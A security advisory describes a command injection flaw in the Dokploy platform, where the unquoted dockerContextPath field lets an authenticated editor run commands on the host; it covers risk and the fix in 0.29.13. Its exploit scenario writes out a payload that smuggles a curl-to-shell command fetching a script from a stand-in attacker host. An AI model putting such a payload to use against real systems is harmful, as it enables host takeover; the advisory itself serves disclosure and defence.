DescriptionCVE.org

Dokploy is a free, self-hostable Platform as a Service (PaaS). Prior to 0.29.13, dockerContextPath accepted by apps/dokploy/components/dashboard/application/build/show.tsx flows through getDockerContextPath in packages/server/src/utils/filesystem/directory.ts into the unquoted cd command in packages/server/src/utils/builders/docker-file.ts before execution by execAsync, allowing an authenticated application editor to execute arbitrary commands on the Dokploy host. This issue is fixed in version 0.29.13.

AnalysisAI

Command injection in Dokploy's Docker build pipeline allows authenticated application editors to execute arbitrary OS commands on the Dokploy host by supplying shell metacharacters in the dockerContextPath build configuration field. The malicious path value flows from the dashboard UI through getDockerContextPath() directly into an unquoted cd shell command executed via execAsync, enabling full host-level code execution under the Dokploy server process. …

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated Dokploy session with at minimum the application editor role - anonymous or read-only users cannot trigger builds or set build configuration. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Real-world risk is high despite the absence of KEV listing or EPSS data. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with a Dokploy account holding application editor permissions navigates to an application's build configuration in the dashboard, sets the Docker context path to a payload such as '. ; curl http://attacker.example/shell.sh | sh', and triggers a build. …
Remediation Upgrade Dokploy to version 0.29.13 or later, which replaces all unquoted user-controlled values in shell command strings with shell-quote-escaped equivalents via the shell-quote npm library's quote() function. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.
